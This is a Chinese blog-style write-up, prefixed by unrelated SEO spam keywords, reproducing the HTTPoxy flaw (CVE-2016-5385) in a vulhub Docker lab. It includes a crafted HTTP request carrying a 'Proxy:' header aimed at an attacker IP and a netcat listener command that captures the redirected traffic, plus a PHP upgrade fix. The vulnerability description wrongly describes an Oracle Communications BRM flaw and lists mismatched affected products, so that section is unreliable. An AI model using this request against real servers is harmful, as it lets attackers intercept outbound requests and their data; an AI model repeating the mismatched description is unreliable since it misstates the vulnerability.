永康做网站的公司,南京网站建设小程序,wordpress 在线教育 模板,河南网站建设公司排名HTTPoxy CGI 应用程序漏洞 CVE-2016-5385 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称
漏洞描述
在Oracle Communications BRM 10.x/12.x#xff08;云软件#xff09;中发现漏洞。它已经被宣布为关键。此漏洞影响组件用户数据库的未… HTTPoxy CGI 应用程序漏洞 CVE-2016-5385 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称
漏洞描述
在Oracle Communications BRM 10.x/12.x云软件中发现漏洞。它已经被宣布为关键。此漏洞影响组件用户数据库的未知功能。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。可以使用Snort ID 39737来识别攻击企图。
影响版本
Redhat Enterprise_Linux_Server 6.0 Oracle Communications_User_Data_Repository 12.0.0 Oracle Enterprise_Manager_Ops_Center 12.3.2 Oracle Communications_User_Data_Repository 10.0.0 8.0.0 Drupal 8.1.7
漏洞复现
环境搭建
受害者IP192.168.63.129:8080 攻击者IP192.168.63.1
vulhub下载链接
https://github.com/vulhub/vulhub
git clone https://github.com/vulhub/vulhub.git启动vulfocus
docker-compose up -d 环境启动后访问http://192.168.63.129:8080即可看到一个nginx页面说明已成功启动。
漏洞利用
正常请求http://192.168.63.129:8080/index.php可见其Origin为当前请求的服务器这里用的自己搭建的环境因此返回公网的IP地址。正常情况下与请求头中的host一致。 在请求头中加入proxy代理这里的Proxy: http://192.168.63.1:1234/不是 HTTP 代理在主机192.168.63.1中不存在该http服务。因此在响应体中返回报错信息。
GET /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Proxy: http://192.168.63.1:1234/在192.168.63.1主机上监听端口,我们可以捕获原始请求。
nc -lvnp 1234在vulhub的官网中响应体返回了正常的请求内容在Origin返回当前请求的服务器与上面返回错误不同的是这里使用的是可以访问的HTTP代理存在http服务。 修复建议
1、补丁链接https://www.php.net/downloads 5.6.24修复了该漏洞